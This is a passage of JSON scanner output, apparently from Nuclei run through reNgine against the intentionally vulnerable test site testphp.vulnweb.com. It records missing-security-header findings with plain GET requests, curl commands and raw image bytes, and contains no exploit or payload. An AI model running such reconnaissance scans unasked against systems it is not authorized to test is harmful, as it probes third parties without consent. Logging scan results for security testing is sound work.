Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:22.204724116Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"path\":\"/pictures/2.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"request\":\"GET /pictures/2.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1353\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-549\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001a\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0001\\u0003\\u0004\\u0005\\u0006\\ufffd\\ufffd\\u0000+\\u0010\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0000\\u0004\\u0007\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1AQ\\\"a\\u00142q\\ufffd\\u0005\\u0013$B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003\\u0001\\u0002\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000'\\u0011\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0001\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1\\u0005Q\\u00132A\\\"#3aq\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffd\\ufffdd\\ufffdH䏺JU\\ufffd\\t\\u000f\\u0008\\ufffdi{\\u0015+f\\ufffd.7\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB6\\ufffd˨\\ufffd\\ufffd\\ufffd\\ufffd͒\\u001bdס\\u001a\\ufffdi\\ufffdE\\ufffdn\\ufffd_\\ufffd\\ufffd%\\u001atN\\u000c\\ufffdpR\\ufffdH\\u001d\\ufffd,֝\\ufffd\\u0000\\u0001 \\u0014\\u0000@'DQ\\u0003\\u0000Qu?b\\ufffd-\\u0010\\u0005\\ufffdL\\u0000\\u0000\\t\\u0000\\u0000\\u0000-\\u0005\\ufffd\\u0001\\ufffd\\ufffd\\u000cH\\ufffd'A\\u0015F\\ufffd\\u001a\\ufffdʔ?z3G\\ufffd^\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdK\\ufffd)\\ufffdۓ\\ufffdl\\ufffd%\\ufffd\\ufffd\\\"䨤\\ufffd\\u001f\\ufffdu\\u0015Ed44\\ufffd2\\u0005\\ufffdS\\ufffdD\\u0002Y\\u0005F\\ufffd`\\u0000\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\r\\u0011L`\\\"\\ufffd)4(\\u000cF\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003%C\\ufffd9\\ufffd\\ufffd1F\\ufffd$\\ufffdc$\\ufffd\\ufffd\\u000f\\ufffd~\\ufffdQ_\\ufffdק{c'K\\ufffd#\\ufffd\\ufffdr|\\ufffdR\\ufffd\\ufffd(\\ufffdԤ\\ufffdI}#;\\ufffd\\ufffdk\\ufffdʚ\\ufffd\\ufffdϳf\\ufffd\\ufffd\\ufffdEmZ\\u0010\\ufffd\\ufffd\\u0012Kȶ\\ufffdА\\ufffd\\ufffdC\\u0001Z\\u001a\\ufffdB\\u0000\\ufffd\\u0006Ҵ1I\\n\\u0004\\ufffd\\u0000X\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ufffd\\u001com\\ufffd\\u0004\\ufffd,\\ufffd7\\u000e\\ufffd}\\ufffd\\\\1\\ufffd,\\ufffd\\u001f\\u0017\\ufffd\\ufffd#\\ufffdwG\\ufffdϫ\\ufffd\\u0016\\ufffd\\ufffd\\ufffddPf\\ufffd\\u003c\\u0013\\ufffdK\\ufffd\\ufffdG\\ufffd4j\\ufffd\\ufffd\\u001c\\ufffdi\\ufffd$\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffdj\\ufffd4C\\u000b\\ufffd\\ufffd\\ufffdg\\ufffd8\\ufffd`\\ufffd.\\ufffdΜy)\\ufffdN\\ufffd\\ufffd?\\ufffd\\ufffdj\\ufffd\\ufffd\\u001a\\ufffd*\\ufffdw\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd),\\u0012\\ufffd5b\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdg%\\ufffd\\ufffd[7e\\ufffdb\\ufffd\\u001a\\ufffd\\u0000/\\ufffd$\\ufffdfiƎ֛3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdХ\\ufffd5b\\ufffdޥ\\ufffd@%Ţ\\u0008\\u0019v\\u0000\\u0000\\u0000\\u0014E\\u0012\\u0000M\\ufffd(\\ufffd\\u0018\\u0008\\ufffdw1h\\ufffd\\ufffd(\\ufffd\\ufffd\\ufffd\\u001e\\u001a7\\ufffd\\ufffdC\\u001c\\ufffd\\ufffd\\ufffd_\\ufffd\\u000c{,\\ufffd\\ufffdَ[]\\ufffd\\ufffdkp\\ufffd\\ufffdp}\\u001d?ĹI\\ufffd\\ufffd'\\ufffd\\u0026\\ufffdjq\\ufffd\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdWO\\ufffd\\ufffd\\ufffd\\ufffdkV\\ufffd\\ufffd\\ufffd}\\u001bq\\ufffd|\\ufffdc]\\ufffdq5\\u0018\\ufffd\\ufffdp\\u0013\\ufffdJ\\ufffd\\u00003\\ufffd\\ufffd]Fhe\\ufffd\\u0018\\ufffd\\ufffdK\\ufffd4\\ufffd%r}\\ufffd\\ufffdW\\ufffd\\ufffdà\\ufffd\\ufffdd\\ufffdh\\ufffd}\\ufffd\\ufffd-\\ufffd\\\\\\ufffd\\ufffd\\u001c\\ufffdE\\ufffd\\ufffd+B\\ufffd+^\\ufffd4j\\ufffd\\ufffd\\u0004\\u0010\\ufffd}\\ufffd\\u0004\\u000cN\\ufffdqb\\ufffd\\u0000Qe?e`6\\ufffd\\u001b~Ȣې\\ufffd6߲v\\ufffd\\ufffd܄\\u0026\\ufffd\\ufffd\\u0014C\\ufffd\\ufffdJ\\ufffdx\\ufffd\\n\\u003enjlԑ\\ufffd\\ufffd5CEY\\ufffd3\\ufffd\\ufffdj=\\ufffd\\nʱ\\ufffd\\ufffdեj\\ufffdб\\ufffd\\u0000N\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffdp\\ufffd\\ufffd\\ufffdk3\\ufffd\\ufffdҾ\\ufffd9\\ufffd\\ufffd\\ufffd}3t\\ufffd\\ufffd\\ufffdψ\\ufffd2J4\\ufffdN\\rvt\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003e\\ufffdq\\ufffd%\\ufffd\\ufffd\\t\\ufffd\\ufffd\\u001fB\\ufffd\\ufffde\\ufffd\\u001bJ\\ufffd\\u001e\\ufffdQM\\\"(\\ufffd»^,]\\ufffde\\\\FG2k\\ufffdWAC\\ufffd\\r\\ufffd\\ufffd.\\ufffdbPQf\\ufffd\\ufffd\\ufffdt[^\\tP\\ufffd\\ufffdΣ\\ufffd(\\ufffd\\ufffd\\ufffd\\u00126\\ufffd6\\ufffdYlJ\\u0026\\ufffd\\ufffd\\ufffdI\\u0013D\\u003c\\ufffd\\ufffd\\ufffdd\\u0017 \\u0006\\ufffd\\ufffdp2\\ufffd\\u000e\\ufffd\\ufffdm%\\u000e6\\ufffd\\ufffd\\ufffduc\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd}\\ufffd\\ufffd\\u0000\\u001dl*⏝y\\ufffdJ\\u0019\\ufffdK\\ufffdNn\\ufffdN\\u0012x\\ufffd䋤rr%`\\u0006-W\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffdEd(\\ufffd\\u0003!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP\\ufffd8\\ufffd\\ufffdk\\ufffd\\ufffd\\u0005)\\ufffd?,\\u0000+\\ufffd\\ufffd\\ufffd;5\\u0012\\ufffd\\u000c2\\ufffd\\ufffd\\ufffd+\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u0000e\\ufffd2\\ufffd\\t7\\ufffd6-\\\"v\\ufffd\\u0001f\\ufffdd\\ufffd\\u0026ͺXA\\ufffd\\ufffd\\ufffdSh\\u0000~\\ufffd\\\\\\ufffdW\\ufffd\\ufffd\\ufffd%O\\ufffd\\ufffdr\\ufffd\\ufffdc\\u0014\\ufffd\\u0004\\u003eΌ\\u001b\\ufffdCHe\\u0014\\u0000\\u0008\\ufffd\\ufffd\\u0007\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:22.204767846Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp/\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003ctitle\\u003eHTTP Parameter Pollution Example\\u003c/title\\u003e\\r\\n\\r\\n\\u003ca href=\\\"?pp=12\\\"\\u003echeck\\u003c/a\\u003e\\u003cbr/\\u003e\\r\\n\\r\\n\\u003chr\\u003e\\r\\n\\u003ca href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'\\u003eOriginal article\\u003c/a\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:22.204794039Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"path\":\"/pictures/1.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"request\":\"GET /pictures/1.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4355\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-1103\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0001\\u0005\\u0003\\u0004\\u0007\\u0002\\ufffd\\ufffd\\u00004\\u0010\\u0000\\u0002\\u0001\\u0003\\u0004\\u0001\\u0003\\u0003\\u0003\\u0003\\u0004\\u0001\\u0005\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!1A\\u0006\\u0013Q\\\"a\\ufffd\\u0014q\\ufffd2\\ufffd\\ufffd#BR\\ufffd\\ufffd\\u0016b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0019\\u0001\\u0000\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0005\\ufffd\\ufffd\\u0000)\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0002\\u0005\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0012A\\u0005\\u0013Q\\ufffd\\ufffd2aq\\ufffd\\\"3\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u003e\\ufffd\\ufffdn?\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ԝB\\ufffdw\\u0018Va\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd.\\ufffdH\\ufffdn\\t \\ufffd\\ufffdr2s\\ufffd\\u0006\\ufffd\\ufffdP\\u0003z\\ufffd\\ufffd8\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0006$}#\\ufffd\\ufffd\\ufffd\\ufffdW\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd\\ufffdc ʸʮ\\u003c\\ufffd\\ufffd\\ufffd\\ufffd׹Er\\ufffd\\n/\\ufffdI\\ufffd\\ufffd\\ufffdj\\ufffd\\u0026\\ufffd\\ufffd\\ufffddY\\u0019@\\ufffdW\\ufffd\\ufffd#\\ufffdr\\u003e\\ufffdϚ\\ufffd\\ufffdlN^}\\ufffd\\u0015\\ufffd#3(|g\\ufffdp0rpO\\ufffd\\ufffdf\\ufffd\\ufffd}%%\\ufffd\\u0006kIE\\ufffdf\\ufffd\\u0010\\ufffd\\u0003\\ufffd\\ufffd\\u0007\\u001f\\ufffd\\ufffd\\u0006\\ufffdzf\\ufffd\\ufffd^\\ufffdC%Ƕ\\ufffd\\u0019\\u00140;C\\u001d\\ufffd\\u0018\\ufffd?\\ufffd\\ufffd\\ufffdz\\ufffd\\\\\\\\[\\ufffd\\ufffd\\u00025\\ufffdy.\\\\\\ufffd\\u00169۟\\ufffd8\\u001fڮ\\ufffd?\\ufffd\\u0019L3\\\\\\ufffd\\ufffd\\ufffd\\u0019#\\u00110\\ufffd\\\\x\\ufffd\\ufffd8\\ufffd#\\ufffd\\u001b\\ufffdZ\\u0015Ʃ|\\ufffd\\u001e5 夑\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdդ\\ufffd=\\u003e\\ufffd\\u001bI\\ufffdi\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n2\\u0006\\u0007۳\\ufffdO^(\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffdP\\ufffd.\\ufffd\\ufffd_fEUR\\u0002}9\\ufffd\\ufffdr6\\ufffd\\ufffd\\ufffd\\ufffd\\u003ej\\ufffdg\\ufffd$g\\ufffd\\u0017$\\ufffd\\u000e\\ufffd{\\ufffd\\ufffd[\\ufffdL\\ufffd\\ufffd\\ufffd9\\ufffd,sXi\\u0026\\u0014y\\ufffd\\ufffd\\ufffdT\\ufffdb*E\\u0014VH\\ufffd\\ufffd퍌\\ufffdI,\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffd0\\u0007\\u0007\\ufffd\\ufffd\\ufffd?\\ufffd\\u0015\\ufffd;\\ufffd\\ufffd\\u0017]\\ufffdJ\\ufffdX\\ufffd\\ufffdFd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$`c\\ufffd\\ufffd2\\ufffd0գ\\ufffd7\\u0016\\ufffdnח\\\"ј;2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp;'9\\u0018\\ufffdz\\ufffd\\u0014\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd[)\\ufffd3Z\\ufffdorEY\\u000c\\ufffd\\u001e|\\u0011\\ufffdq\\ufffd|\\u001e\\ufffd\\ufffda\\u001e\\ufffdu$-\\u000bJ\\ufffd\\u001f;\\ufffd\\ufffd\\u0000p\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffdT\\ufffd\\ufffd\\ufffd\\\"\\ufffdM\\ufffd\\ufffd1\\ufffd06\\ufffdۉ\\u0001O\\u0000\\ufffdg\\u001c\\ufffd\\ufffd\\ufffdN\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd]\\ufffd%ܰ\\ufffd\\ufffdH\\u0010s\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015S\\ufffdz\\ufffdi\\ufffd%\\ufffd@\\ufffd\\ufffd@G\\ufffd\\u0007`,@#'\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdl\\u0004\\ufffdX\\ufffdX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\u0014\\ufffdA\\ufffdU\\ufffd\\\\6i\\nٱ\\ufffd\\ufffd-~\\\"2ƂDP\\ufffd\\ufffd`\\ufffd\\u0000\\u0003\\ufffd\\u0001\\ufffd\\ufffdV׿\\u0015\\u0014$\\ufffdm\\ufffd\\ufffdIsr\\ufffd0Uf\\ufffd\\ufffd\\u0014\\u0003\\ufffd\\ufffd.\\ufffdsq\\ufffd\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd]\\ufffd8\\u001fj\\ufffd\\u0006\\ufffd\\ufffdb\\ufffd/,\\ufffd\\u001e\\ufffd\\ufffd]B\\u0015\\\"\\ufffd\\ufffd\\nS\\ufffdp\\ufffd\\ufffd\\u003e3\\ufffd\\u0000\\\\S\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd6\\ufffdRI[\\u000258\\ufffd\\ufffd\\u0000\\u000b\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003cbDxAiJ\\ufffd\\u0026\\ufffdn8\\u000b\\ufffd\\u0007\\ufffd\\ufffd\\ufffd' f\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffd,jR\\u0018\\ufffd\\u0015Oǎ\\u0007\\u0003\\ufffd:\\ufffd\\ufffd\\ufffd+\\u001fO\\ufffdb\\ufffd\\ufffd\\u0017z\\ufffd\\ufffdF\\u0014\\ufffd\\u000bI\\u0003,b1\\ufffdS#$\\u00022\\t\\ufffd3\\ufffdq\\ufffd\\ufffd ^\\u0016$\\ufffd'\\ufffd\\ufffd\\u001e\\ufffdԭ\\ufffd-೾\\ufffdi\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\u0013g\\u00039##\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd?L\\ufffdH\\ufffd\\u0000D\\ufffd\\ufffdO\\ufffdIw\\ufffd\\u0000S}D\\ufffd\\ufffd\\u0000\\r\\ufffdpz\\ufffd\\ufffd\\u0010\\ufffdA\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\u001a\\ufffda\\ufffdto\\ufffd^\\ufffd\\ufffd\\ufffdv\\ufffd~\\ufffd1\\ufffd\\ufffd\\u0000\\ufffd\\u003c\\ufffd\\u000f\\ufffdU\\\\Zl\\ufffdh\\ufffd%\\ufffd\\u001e񊫊o\\u00004\\ufffd暮\\ufffdKD\\ufffd\\ufffdS\\ufffd\\ufffda\\ufffd,\\ufffd\\\"\\ufffdr\\\\\\u0004\\u001f\\ufffdT\\u001f\\u003c\\u000c\\ufffd\\ufffd\\ufffd\\u001aV\\ufffdK\\ufffd\\ufffd'\\ufffd*qEn\\ufffd\\u0000\\ufffd\\u0014b\\ufffd\\ufffd(\\ufffdՎ\\u000c\\ufffd\\u0018\\ufffd3\\ufffdg\\u0015Ҵ\\ufffd\\u001d,\\\\$\\ufffdE\\ufffd\\ufffd\\ufffd}\\ufffd\\ufffd\\u00021\\ufffdO\\u001d\\ufffdۏ\\ufffd\\ufffd\\ufffd\\u0004]'G\\ufffd\\ufffd\\ufffd\\ufffdx!wH\\ufffd\\u0007j\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\u0004wz\\\\x\\u0018B\\ufffd\\ufffd\\ufffd\\u0014dy\\ufffd\\ufffdG\\ufffd\\ufffd-\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003eL\\ufffdMR\\ufffd!\\ufffd\\ufffd\\ufffdKh\\ufffd$\\u0026]\\ufffdI\\ufffd\\u0002\\n\\ufffds\\ufffd\\ufffd?ǐ+\\ufffdkz5\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffdR\\ufffd\\u0007!b\\ufffdNJ\\ufffd\\u001b\\ufffd\\u001dq\\ufffds\\ufffd8\\u00184\\ufffdt\\ufffdm\\ufffd\\ufffd\\ufffd\\u00067\\ufffdwb\\ufffd\\t`\\ufffd\\ufffd\\ufffd{\\u0001\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\u000f\\ufffd9\\ufffd,c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd$\\u0003\\ufffd\\u001dW.\\ufffdR\\ufffd\\nO+\\ufffd\\ufffd4\\ufffd\\u0017\\u0008\\ufffd\\ufffd\\u0018\\ufffdr.\\rx\\ufffd\\ufffd\\ufffd!\\u0014\\ufffd\\u0000;=U\\ufffdiw6:\\ufffd\\ufffdȻ\\ufffd\\u0019L{\\ufffdK#\\u0010q\\ufffd\\ufffd`\\ufffd:6\\u000eFA\\u001eE8zwVKM6In\\ufffdnj2\\ufffd]Ý\\ufffd\\ufffd\\ufffdDn8\\u0000\\ufffd\\u003eOc5\\u0018K`\\ufffd:\\ufffd\\ufffdv\\ufffd|Q\\ufffd^\\u0018/\\u00034\\ufffd$\\n\\u0000\\ufffd\\u0007\\u00